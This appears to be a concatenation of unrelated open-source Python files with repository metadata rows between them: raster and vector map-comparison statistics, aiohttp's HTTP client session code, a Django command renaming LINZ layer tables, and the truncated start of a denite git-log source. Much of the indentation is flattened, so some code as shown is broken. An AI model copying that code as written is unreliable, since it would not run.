raster2_src = raster2.read(1, masked=True)
# Compute the intersection of the masks of both rasters and use
# that as a value mask.
value_mask = raster1_src.mask & raster2_src.mask
# Then set the mask of both raster to the intersection mask
raster1_src.mask = value_mask
raster2_src.mask = value_mask
            # Include only cells with actual values
raster1_values = ma.compressed(raster1_src)
raster2_values = ma.compressed(raster2_src)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating correlation ".format(prefix) +
"between {} ".format(input_rasters[i]) +
"and {}".format(input_rasters[j])))
# Compute Kendall's tau rank correlation
tau, pvalue = kendalltau(raster1_values, raster2_values)
llogger.debug("Tau: {0} (p-value: {1})".format(tau, pvalue))
correlations = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"tau": [tau],
"pvalue": [pvalue]})
all_correlations = pd.concat([all_correlations, correlations])
no_computation += 1
all_correlations.index = np.arange(0, len(all_correlations.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_correlations
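# --- Illustrative sketch, not part of the original module --------------------
# The masking idea used above, shown on toy masked arrays instead of rasters.
# The module assumes both inputs share the same valid-cell footprint, so both
# toy arrays get an identical mask; kendalltau() then only sees the compressed
# (unmasked) values. All numbers are made up.
def _example_rank_correlation():
    a = ma.masked_array([1.0, 2.0, 3.0, 4.0], mask=[False, False, True, False])
    b = ma.masked_array([2.0, 1.0, 9.0, 5.0], mask=[False, False, True, False])
    return kendalltau(ma.compressed(a), ma.compressed(b))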
def cross_jaccard(input_rasters, thresholds, verbose=False, logger=None):
""" Calculate Jaccard coefficients between all the inpur rasters.
This is a utility function that is intented to be used to compare
fractions of the landscape.
:param input_rasters list of input raster paths.
:param thresholds vector of numeric tuples (x_min, x_max, y_min, y_max) values of thresholds.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:param ... additional arguments passed on to jaccard().
:return Pandas Dataframe with Jaccard coefficients between all rasters.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_jaccard')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
assert len(thresholds) >= 1, "At least one tuple of thresholds is needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING JACCARD INDICES **]")
all_jaccards = pd.DataFrame({"feature1": [], "feature2": [],
"threshold": [], "coef": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2 * len(thresholds))
no_computation = 1
for threshold in thresholds:
if len(threshold) != 4:
llogger.error("Threshold tuple needs 4 values")
            continue
for i in range(0, n_rasters):
x_min, x_max, y_min, y_max = threshold
raster1 = rasterio.open(input_rasters[i])
# To calculate the Jaccard index we are dealing with binary data
# only. Avoid using masked arrays and replace NoData values with
# zeros.
raster1_nodata = raster1.nodata
raster1_src = raster1.read(1)
np.place(raster1_src, np.isclose(raster1_src, raster1_nodata), 0.0)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_nodata = raster2.nodata
raster2_src = raster2.read(1)
np.place(raster2_src, np.isclose(raster2_src, raster2_nodata),
0.0)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating Jaccard ".format(prefix) +
"index for [{0}, {1}] ".format(x_min, x_max) +
"in {} ".format(input_rasters[i]) +
"and, [{0}, {1}] ".format(y_min, y_max) +
"in {}".format(input_rasters[j])))
coef = compute_jaccard(raster1_src, raster2_src,
x_min=x_min, x_max=x_max,
y_min=y_min, y_max=y_max)
jaccards = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"threshold": [threshold],
"coef": [coef]})
all_jaccards = pd.concat([all_jaccards, jaccards])
no_computation += 1
all_jaccards.index = np.arange(0, len(all_jaccards.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_jaccards
def compute_mcs(a, b):
""" Compute MCS between vectors a and b.
:param a numeric vector.
:param b numeric vector.
:return ndarray of computed MCS scores.
"""
assert len(a) == len(b), "Vectors a and b must be of same length"
N = len(a)
    # Running total used to accumulate the per-element MCS contributions.
mcs = 0
nans = False
for i in range(0, N):
if np.isnan(a[i]) or np.isnan(b[i]):
nans = True
else:
# If eiher a or b is 0, do nothing as division would fail
if a[i] == 0.0 or b[i] == 0.0:
pass
else:
abs_subs = np.abs(a[i] - b[i]) / np.max([a[i], b[i]])
mcs += abs_subs
if nans:
print("WARNING: a and/or b contain NaNs")
return mcs / N
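# --- Illustrative sketch, not part of the original module --------------------
# A tiny, made-up example of compute_mcs(): each element contributes
# |a_i - b_i| / max(a_i, b_i) (zeros and NaNs are skipped), averaged over all
# elements, so the vectors below give (0 + 0.5 + 0.5) / 3 = 1/3.
def _example_compute_mcs():
    a = np.array([1.0, 2.0, 4.0])
    b = np.array([1.0, 1.0, 2.0])
    return compute_mcs(a, b)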
def cross_mcs(input_vectors, value_fields, verbose=False, logger=None):
""" Compute map comparison statistics between input vector features.
MCS (Map Comparison Statistic) indicates the average difference between any
pair of feature polygon values, expressed as a fraction of the highest
value. MCS is calculated between each polygon in the input vector features
and it is required (and checked) that all the inputs are based on the
same vector feature.
For another application of MCS, see:
Schulp, C. J. E., Burkhard, B., Maes, J., Van Vliet, J., & Verburg, P. H.
(2014). Uncertainties in Ecosystem Service Maps: A Comparison on the
European Scale. PLoS ONE, 9(10), e109643.
http://doi.org/10.1371/journal.pone.0109643
:param input_vectors list of input vector paths.
:param value_field list of String names indicating which fields contains
the values to be compared.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return list of GeoPandas Dataframe with MCS between all rasters in field
"mcs".
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_mcs')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_vectors) > 1, "More than one input vector needed"
assert len(value_fields) == len(input_vectors), "One value field per vector feature needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING MCS SCORES **]")
all_mcs = pd.DataFrame({"feature1": [], "feature2": [],
"mcs": []})
n_vectors = len(input_vectors)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_vectors * n_vectors - n_vectors) / 2)
no_computation = 1
for i in range(0, n_vectors):
# Read in the data as a GeoPandas dataframe
vector1_path = input_vectors[i]
vector1 = gpd.read_file(vector1_path)
for j in range(i+1, n_vectors):
vector2_path = input_vectors[j]
vector2 = gpd.read_file(vector2_path)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating MCS ".format(prefix) +
"between {} ".format(vector1_path) +
"and {}".format(vector2_path)))
a = vector1[value_fields[i]]
b = vector2[value_fields[j]]
mcs_value = compute_mcs(a, b)
mcs = pd.DataFrame({"feature1": [vector1_path],
"feature2": [vector2_path],
"mcs": [mcs_value]})
all_mcs = pd.concat([all_mcs, mcs])
no_computation += 1
all_mcs.index = np.arange(0, len(all_mcs.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_mcs
def plu_variation(input_files, input_codes, logger=None):
""" Compute per planning unit (PLU) variation statistics.
Given a list of input features describing the same planinng units,
calculate statistics based on defined field names.
:param input_files: String list of paths to input (vector) features.
:param input_codes: String list of field names corresponding to each
input feature. The statistics will calculated based on
these fields.
:param logger: Logger object.
:return: GeoPandas DataFrame object.
"""
# Set up logging
if not logger:
logging.basicConfig()
llogger = logging.getLogger('plu_variation')
llogger.setLevel(logging.INFO)
else:
llogger = logger
n_features = len(input_files)
# Create an empty DataFrame to store the rank priority cols
rank_values = pd.DataFrame({'NUTS_ID': []})
llogger.info("[1/2] Reading in {} features...".format(n_features))
for i, feature_file in enumerate(input_files):
feature_code = input_codes[i]
prefix = utils.get_iteration_prefix(i+1, n_features)
llogger.debug("{0} Processing feature {1}".format(prefix,
feature_file))
# Read in the feature as GeoPandas dataframe
feat_data = gpd.read_file(feature_file)
# Two different field names are used to store the mean rank
# information: "_mean" for geojson-files and 'Men_rnk' for
# shapefiles. Figure out which is currently used.
if '_mean' in feat_data.columns:
mean_field = '_mean'
elif 'Men_rnk' in feat_data.columns:
mean_field = 'Men_rnk'
else:
llogger.error("Field '_mean' or 'Men_rnk' not found")
raise ValueError
# On first iteration, also get the NUTS_ID column
        if i == 0:
rank_values['NUTS_ID'] = feat_data['NUTS_ID']
# Get the rank priority column and place if the store DataFrame
rank_values[feature_code] = feat_data[mean_field]
llogger.info("[2/2] Calculating mean and STD...")
# Read in the first input feature to act as a template.
output_feature = gpd.read_file(input_files[0])
# Only take one field: NUTS_ID
output_feature = output_feature[['geometry', 'NUTS_ID']]
# Merge with the collected data
output_feature = output_feature.merge(rank_values, on='NUTS_ID')
# Calculate mean
agg_means = output_feature.mean(1)
# Calculate STD
agg_stds = output_feature.std(1)
output_feature['agg_mean'] = agg_means
output_feature['agg_std'] = agg_stds
return output_feature
| mit | -3,889,173,436,250,582,000 | 41.169374 | 108 | 0.592737 | false |
jashandeep-sohi/aiohttp | aiohttp/client.py | 1 | 25360 | """HTTP Client for asyncio."""
import asyncio
import base64
import hashlib
import os
import sys
import traceback
import warnings
import http.cookies
import urllib.parse
import aiohttp
from .client_reqrep import ClientRequest, ClientResponse
from .errors import WSServerHandshakeError
from .multidict import MultiDictProxy, MultiDict, CIMultiDict, upstr
from .websocket import WS_KEY, WebSocketParser, WebSocketWriter
from .websocket_client import ClientWebSocketResponse
from . import hdrs
__all__ = ('ClientSession', 'request', 'get', 'options', 'head',
'delete', 'post', 'put', 'patch', 'ws_connect')
PY_35 = sys.version_info >= (3, 5)
class ClientSession:
"""First-class interface for making HTTP requests."""
_source_traceback = None
_connector = None
def __init__(self, *, connector=None, loop=None, cookies=None,
headers=None, skip_auto_headers=None,
auth=None, request_class=ClientRequest,
response_class=ClientResponse,
ws_response_class=ClientWebSocketResponse,
version=aiohttp.HttpVersion11):
if connector is None:
connector = aiohttp.TCPConnector(loop=loop)
loop = connector._loop # never None
else:
if loop is None:
loop = connector._loop # never None
elif connector._loop is not loop:
raise ValueError("loop argument must agree with connector")
self._loop = loop
if loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
self._cookies = http.cookies.SimpleCookie()
        # For backward compatibility with `share_cookies` connectors
if connector._share_cookies:
self._update_cookies(connector.cookies)
if cookies is not None:
self._update_cookies(cookies)
self._connector = connector
self._default_auth = auth
self._version = version
# Convert to list of tuples
if headers:
headers = CIMultiDict(headers)
else:
headers = CIMultiDict()
self._default_headers = headers
if skip_auto_headers is not None:
self._skip_auto_headers = frozenset([upstr(i)
for i in skip_auto_headers])
else:
self._skip_auto_headers = frozenset()
self._request_class = request_class
self._response_class = response_class
self._ws_response_class = ws_response_class
def __del__(self, _warnings=warnings):
if not self.closed:
self.close()
_warnings.warn("Unclosed client session {!r}".format(self),
ResourceWarning)
context = {'client_session': self,
'message': 'Unclosed client session'}
if self._source_traceback is not None:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
def request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
"""Perform HTTP request."""
return _RequestContextManager(
self._request(
method,
url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof))
@asyncio.coroutine
def _request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
if version is not None:
warnings.warn("HTTP version should be specified "
"by ClientSession constructor", DeprecationWarning)
else:
version = self._version
if self.closed:
raise RuntimeError('Session is closed')
redirects = 0
history = []
if not isinstance(method, upstr):
method = upstr(method)
# Merge with default headers and transform to CIMultiDict
headers = self._prepare_headers(headers)
if auth is None:
auth = self._default_auth
# It would be confusing if we support explicit Authorization header
# with `auth` argument
if (headers is not None and
auth is not None and
hdrs.AUTHORIZATION in headers):
raise ValueError("Can't combine `Authorization` header with "
"`auth` argument")
skip_headers = set(self._skip_auto_headers)
if skip_auto_headers is not None:
for i in skip_auto_headers:
skip_headers.add(upstr(i))
while True:
req = self._request_class(
method, url, params=params, headers=headers,
skip_auto_headers=skip_headers, data=data,
cookies=self.cookies, encoding=encoding,
auth=auth, version=version, compress=compress, chunked=chunked,
expect100=expect100,
loop=self._loop, response_class=self._response_class)
conn = yield from self._connector.connect(req)
try:
resp = req.send(conn.writer, conn.reader)
try:
yield from resp.start(conn, read_until_eof)
except:
resp.close()
conn.close()
raise
except (aiohttp.HttpProcessingError,
aiohttp.ServerDisconnectedError) as exc:
raise aiohttp.ClientResponseError() from exc
except OSError as exc:
raise aiohttp.ClientOSError(*exc.args) from exc
self._update_cookies(resp.cookies)
            # For backward compatibility with `share_cookie` connectors
if self._connector._share_cookies:
self._connector.update_cookies(resp.cookies)
# redirects
if resp.status in (301, 302, 303, 307) and allow_redirects:
redirects += 1
history.append(resp)
if max_redirects and redirects >= max_redirects:
resp.close()
break
else:
# TODO: close the connection if BODY is large enough
# Redirect with big BODY is forbidden by HTTP protocol
# but malformed server may send illegal response.
# Small BODIES with text like "Not Found" are still
# perfectly fine and should be accepted.
yield from resp.release()
# For 301 and 302, mimic IE behaviour, now changed in RFC.
# Details: https://github.com/kennethreitz/requests/pull/269
if resp.status != 307:
method = hdrs.METH_GET
data = None
if headers.get(hdrs.CONTENT_LENGTH):
headers.pop(hdrs.CONTENT_LENGTH)
r_url = (resp.headers.get(hdrs.LOCATION) or
resp.headers.get(hdrs.URI))
scheme = urllib.parse.urlsplit(r_url)[0]
if scheme not in ('http', 'https', ''):
resp.close()
raise ValueError('Can redirect only to http or https')
elif not scheme:
r_url = urllib.parse.urljoin(url, r_url)
url = r_url
yield from resp.release()
continue
break
resp._history = tuple(history)
return resp
def ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
"""Initiate websocket connection."""
return _WSRequestContextManager(
self._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
auth=auth,
origin=origin))
@asyncio.coroutine
def _ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
sec_key = base64.b64encode(os.urandom(16))
headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_VERSION: '13',
hdrs.SEC_WEBSOCKET_KEY: sec_key.decode(),
}
if protocols:
headers[hdrs.SEC_WEBSOCKET_PROTOCOL] = ','.join(protocols)
if origin is not None:
headers[hdrs.ORIGIN] = origin
# send request
resp = yield from self.get(url, headers=headers,
read_until_eof=False,
auth=auth)
try:
# check handshake
if resp.status != 101:
raise WSServerHandshakeError(
message='Invalid response status',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.UPGRADE, '').lower() != 'websocket':
raise WSServerHandshakeError(
message='Invalid upgrade header',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.CONNECTION, '').lower() != 'upgrade':
raise WSServerHandshakeError(
message='Invalid connection header',
code=resp.status,
headers=resp.headers)
# key calculation
key = resp.headers.get(hdrs.SEC_WEBSOCKET_ACCEPT, '')
match = base64.b64encode(
hashlib.sha1(sec_key + WS_KEY).digest()).decode()
if key != match:
raise WSServerHandshakeError(
message='Invalid challenge response',
code=resp.status,
headers=resp.headers)
# websocket protocol
protocol = None
if protocols and hdrs.SEC_WEBSOCKET_PROTOCOL in resp.headers:
resp_protocols = [
proto.strip() for proto in
resp.headers[hdrs.SEC_WEBSOCKET_PROTOCOL].split(',')]
for proto in resp_protocols:
if proto in protocols:
protocol = proto
break
reader = resp.connection.reader.set_parser(WebSocketParser)
resp.connection.writer.set_tcp_nodelay(True)
writer = WebSocketWriter(resp.connection.writer, use_mask=True)
except Exception:
resp.close()
raise
else:
return self._ws_response_class(reader,
writer,
protocol,
resp,
timeout,
autoclose,
autoping,
self._loop)
def _update_cookies(self, cookies):
"""Update shared cookies."""
if isinstance(cookies, dict):
cookies = cookies.items()
for name, value in cookies:
if isinstance(value, http.cookies.Morsel):
# use dict method because SimpleCookie class modifies value
# before Python 3.4
dict.__setitem__(self.cookies, name, value)
else:
self.cookies[name] = value
def _prepare_headers(self, headers):
""" Add default headers and transform it to CIMultiDict
"""
# Convert headers to MultiDict
result = CIMultiDict(self._default_headers)
if headers:
if not isinstance(headers, (MultiDictProxy, MultiDict)):
headers = CIMultiDict(headers)
added_names = set()
for key, value in headers.items():
if key in added_names:
result.add(key, value)
else:
result[key] = value
added_names.add(key)
return result
def get(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP GET request."""
return _RequestContextManager(
self._request(hdrs.METH_GET, url,
allow_redirects=allow_redirects,
**kwargs))
def options(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP OPTIONS request."""
return _RequestContextManager(
self._request(hdrs.METH_OPTIONS, url,
allow_redirects=allow_redirects,
**kwargs))
def head(self, url, *, allow_redirects=False, **kwargs):
"""Perform HTTP HEAD request."""
return _RequestContextManager(
self._request(hdrs.METH_HEAD, url,
allow_redirects=allow_redirects,
**kwargs))
def post(self, url, *, data=None, **kwargs):
"""Perform HTTP POST request."""
return _RequestContextManager(
self._request(hdrs.METH_POST, url,
data=data,
**kwargs))
def put(self, url, *, data=None, **kwargs):
"""Perform HTTP PUT request."""
return _RequestContextManager(
self._request(hdrs.METH_PUT, url,
data=data,
**kwargs))
def patch(self, url, *, data=None, **kwargs):
"""Perform HTTP PATCH request."""
return _RequestContextManager(
self._request(hdrs.METH_PATCH, url,
data=data,
**kwargs))
def delete(self, url, **kwargs):
"""Perform HTTP DELETE request."""
return _RequestContextManager(
self._request(hdrs.METH_DELETE, url,
**kwargs))
def close(self):
"""Close underlying connector.
Release all acquired resources.
"""
if not self.closed:
self._connector.close()
self._connector = None
ret = asyncio.Future(loop=self._loop)
ret.set_result(None)
return ret
@property
def closed(self):
"""Is client session closed.
A readonly property.
"""
return self._connector is None or self._connector.closed
@property
def connector(self):
"""Connector instance used for the session."""
return self._connector
@property
def cookies(self):
"""The session cookies."""
return self._cookies
@property
def version(self):
"""The session HTTP protocol version."""
return self._version
def detach(self):
"""Detach connector from session without closing the former.
Session is switched to closed state anyway.
"""
self._connector = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if PY_35:
@asyncio.coroutine
def __aenter__(self):
return self
@asyncio.coroutine
def __aexit__(self, exc_type, exc_val, exc_tb):
yield from self.close()
if PY_35:
from collections.abc import Coroutine
base = Coroutine
else:
base = object
class _BaseRequestContextManager(base):
__slots__ = ('_coro', '_resp')
def __init__(self, coro):
self._coro = coro
self._resp = None
def send(self, value):
return self._coro.send(value)
def throw(self, typ, val=None, tb=None):
if val is None:
return self._coro.throw(typ)
elif tb is None:
return self._coro.throw(typ, val)
else:
return self._coro.throw(typ, val, tb)
def close(self):
return self._coro.close()
@property
def gi_frame(self):
return self._coro.gi_frame
@property
def gi_running(self):
return self._coro.gi_running
@property
def gi_code(self):
return self._coro.gi_code
def __next__(self):
return self.send(None)
@asyncio.coroutine
def __iter__(self):
resp = yield from self._coro
return resp
if PY_35:
def __await__(self):
resp = yield from self._coro
return resp
@asyncio.coroutine
def __aenter__(self):
self._resp = yield from self._coro
return self._resp
if not PY_35:
try:
from asyncio import coroutines
coroutines._COROUTINE_TYPES += (_BaseRequestContextManager,)
except:
pass
class _RequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
if exc_type is not None:
self._resp.close()
else:
yield from self._resp.release()
class _WSRequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
yield from self._resp.close()
class _DetachedRequestContextManager(_RequestContextManager):
__slots__ = _RequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
@asyncio.coroutine
def __iter__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
if PY_35:
def __await__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
def __del__(self):
self._session.detach()
class _DetachedWSRequestContextManager(_WSRequestContextManager):
__slots__ = _WSRequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
def __del__(self):
self._session.detach()
def request(method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
cookies=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
connector=None,
loop=None,
read_until_eof=True,
request_class=None,
response_class=None):
"""Constructs and sends a request. Returns response object.
:param str method: HTTP method
:param str url: request url
:param params: (optional) Dictionary or bytes to be sent in the query
string of the new request
:param data: (optional) Dictionary, bytes, or file-like object to
send in the body of the request
:param dict headers: (optional) Dictionary of HTTP Headers to send with
the request
:param dict cookies: (optional) Dict object to send with the request
:param auth: (optional) BasicAuth named tuple represent HTTP Basic Auth
:type auth: aiohttp.helpers.BasicAuth
:param bool allow_redirects: (optional) If set to False, do not follow
redirects
:param version: Request HTTP version.
:type version: aiohttp.protocol.HttpVersion
:param bool compress: Set to True if request has to be compressed
with deflate encoding.
:param chunked: Set to chunk size for chunked transfer encoding.
:type chunked: bool or int
:param bool expect100: Expect 100-continue response from server.
:param connector: BaseConnector sub-class instance to support
connection pooling.
:type connector: aiohttp.connector.BaseConnector
:param bool read_until_eof: Read response until eof if response
does not have Content-Length header.
:param request_class: (optional) Custom Request class implementation.
:param response_class: (optional) Custom Response class implementation.
:param loop: Optional event loop.
Usage::
>>> import aiohttp
>>> resp = yield from aiohttp.request('GET', 'http://python.org/')
>>> resp
<ClientResponse(python.org/) [200]>
>>> data = yield from resp.read()
"""
warnings.warn("Use ClientSession().request() instead", DeprecationWarning)
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
kwargs = {}
if request_class is not None:
kwargs['request_class'] = request_class
if response_class is not None:
kwargs['response_class'] = response_class
session = ClientSession(loop=loop,
cookies=cookies,
connector=connector,
**kwargs)
return _DetachedRequestContextManager(
session._request(method, url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof),
session=session)
def get(url, **kwargs):
warnings.warn("Use ClientSession().get() instead", DeprecationWarning)
return request(hdrs.METH_GET, url, **kwargs)
def options(url, **kwargs):
warnings.warn("Use ClientSession().options() instead", DeprecationWarning)
return request(hdrs.METH_OPTIONS, url, **kwargs)
def head(url, **kwargs):
warnings.warn("Use ClientSession().head() instead", DeprecationWarning)
return request(hdrs.METH_HEAD, url, **kwargs)
def post(url, **kwargs):
warnings.warn("Use ClientSession().post() instead", DeprecationWarning)
return request(hdrs.METH_POST, url, **kwargs)
def put(url, **kwargs):
warnings.warn("Use ClientSession().put() instead", DeprecationWarning)
return request(hdrs.METH_PUT, url, **kwargs)
def patch(url, **kwargs):
warnings.warn("Use ClientSession().patch() instead", DeprecationWarning)
return request(hdrs.METH_PATCH, url, **kwargs)
def delete(url, **kwargs):
warnings.warn("Use ClientSession().delete() instead", DeprecationWarning)
return request(hdrs.METH_DELETE, url, **kwargs)
def ws_connect(url, *, protocols=(), timeout=10.0, connector=None, auth=None,
ws_response_class=ClientWebSocketResponse, autoclose=True,
autoping=True, loop=None, origin=None, headers=None):
warnings.warn("Use ClientSession().ws_connect() instead",
DeprecationWarning)
if loop is None:
loop = asyncio.get_event_loop()
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
session = aiohttp.ClientSession(loop=loop, connector=connector, auth=auth,
ws_response_class=ws_response_class,
headers=headers)
return _DetachedWSRequestContextManager(
session._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
origin=origin),
session=session)
| apache-2.0 | -5,988,827,585,146,491,000 | 32.456464 | 79 | 0.536199 | false |
opennewzealand/linz2osm | linz2osm/data_dict/management/commands/update_layer_names.py | 1 | 4626 | # LINZ-2-OSM
# Copyright (C) Koordinates Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.db import transaction, connection, connections
from linz2osm.data_dict.models import Layer, LayerInDataset, Dataset, Tag
RENAMES = {
'breakwtr_cl': 'breakwater_cl',
'cattlstp_pnt': 'cattlestop_pnt',
'cblwy_ind_cl': 'cableway_industrial_cl',
'cblwy_peo_cl': 'cableway_people_cl',
'descrip_text': 'descriptive_text',
'dredg_tl_cl': 'dredge_tailing_cl',
'embankmnt_cl': 'embankment_cl',
'ferry_cr_cl': 'ferry_crossing_cl',
'fish_fm_poly': 'fish_farm_poly',
'floodgte_pnt': 'floodgate_pnt',
'gas_val_pnt': 'gas_valve_pnt',
'geo_name': 'geographic_name',
'gl_lake_poly': 'glacial_lake_poly',
'golf_crs_pnt': 'golf_course_pnt',
'golf_crs_poly': 'golf_course_poly',
'grav_pit_poly': 'gravel_pit_poly',
'hist_ste_pnt': 'historic_site_pnt',
'ice_clf_edge': 'ice_cliff_edge',
'ice_strm_cl': 'ice_stream_pnt',
'marne_fm_cl': 'marine_farm_cl',
'marne_fm_poly': 'marine_farm_poly',
'melt_strm_cl': 'melt_stream_cl',
'moran_wl_poly': 'moraine_wall_poly',
'pumce_pt_poly': 'pumice_pit_poly',
'racetrk_cl': 'racetrack_cl',
'racetrk_pnt': 'racetrack_pnt',
'racetrk_poly': 'racetrack_poly',
'radar_dm_pnt': 'radar_dome_pnt',
'rail_stn_pnt': 'rail_station_pnt',
'reservr_poly': 'reservoir_poly',
'res_area_poly': 'residential_area_poly',
'rifle_rg_poly': 'rifle_range_poly',
'rock_out_pnt': 'rock_outcrop_pnt',
'sat_stn_pnt': 'satellite_station_pnt',
'scatscrb_poly': 'scattered_scrub_poly',
'shelt_blt_cl': 'shelter_belt_cl',
'showgrd_poly': 'showground_poly',
'spillwy_edge': 'spillway_edge',
'sprtfld_poly': 'sportsfield_poly',
'telephn_cl': 'telephone_cl',
'waterfal_edg': 'waterfall_edge',
'waterfal_cl': 'waterfall_cl',
'waterfal_pnt': 'waterfall_pnt',
'waterfal_poly': 'waterfall_poly',
'water_r_cl': 'water_race_cl',
}
class Command(BaseCommand):
help = "Rename layers with old abbreviated names"
def handle(self, **options):
# drop existing layers with new names: only needed if you've run dd_load
# before update_layer_names
# for new_name in RENAMES.values():
# for l in Layer.objects.filter(name=new_name):
# l.delete()
with transaction.commit_on_success():
cursor = connection.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE data_dict_layer SET name = %s WHERE name = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_tag SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_layerindataset SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
print 'CONNECTION: default'
for q in connection.queries:
print q['sql']
# the actual layers
for conn_name in connections:
if conn_name != 'default':
conn = connections[conn_name]
with transaction.commit_on_success():
cursor = conn.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s;", [new_name, old_name])
cursor.execute("SELECT 1 FROM pg_tables WHERE schemaname='public' AND tablename=%s;", [old_name])
old_table_exists = cursor.fetchall()
if old_table_exists:
print "In %s renaming %s to %s" % (conn_name, old_name, new_name)
cursor.execute("ALTER TABLE %s RENAME TO %s;" % (old_name, new_name))
print 'CONNECTION: %s' % (conn_name,)
for q in conn.queries:
print q['sql']
| gpl-3.0 | 9,209,304,426,773,775,000 | 42.641509 | 134 | 0.610463 | false |
kmnk/gitn | rplugin/python3/denite/source/gitn_log.py | 1 | 5421 | # File: gitn_log.py
# Author: kmnk <kmnknmk at gmail.com>
# License: MIT license
from gitn.enum import Window
from gitn.util.gitn import Gitn
from denite.process import Process
import os
import re
import time
from .gitn import Source as Base
DATE_GRAPH_HIGHLIGHT = {
'container': {
'name': 'gitnLog_dateGraphHeader',
'pattern': '\\v((\d{4}\/\d{2}\/\d{2} \d{2}:\d{2} )| {16} )[*|\/\-\ ]+',
},
'containees': [
{
'name': 'gitnLog_date',
'pattern': '\\v\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}',
'color': 'Comment',
'next': 'gitnLog_graph',
},
{
'name': 'gitnLog_graph',
'pattern': '\\v[*|\/\-\\ ]+',
'color': 'Statement',
},
],
}
AUTHOR_NAME_HIGHLIGHT = {
'container': {
'name': 'gitnLog_authorNameHeader',
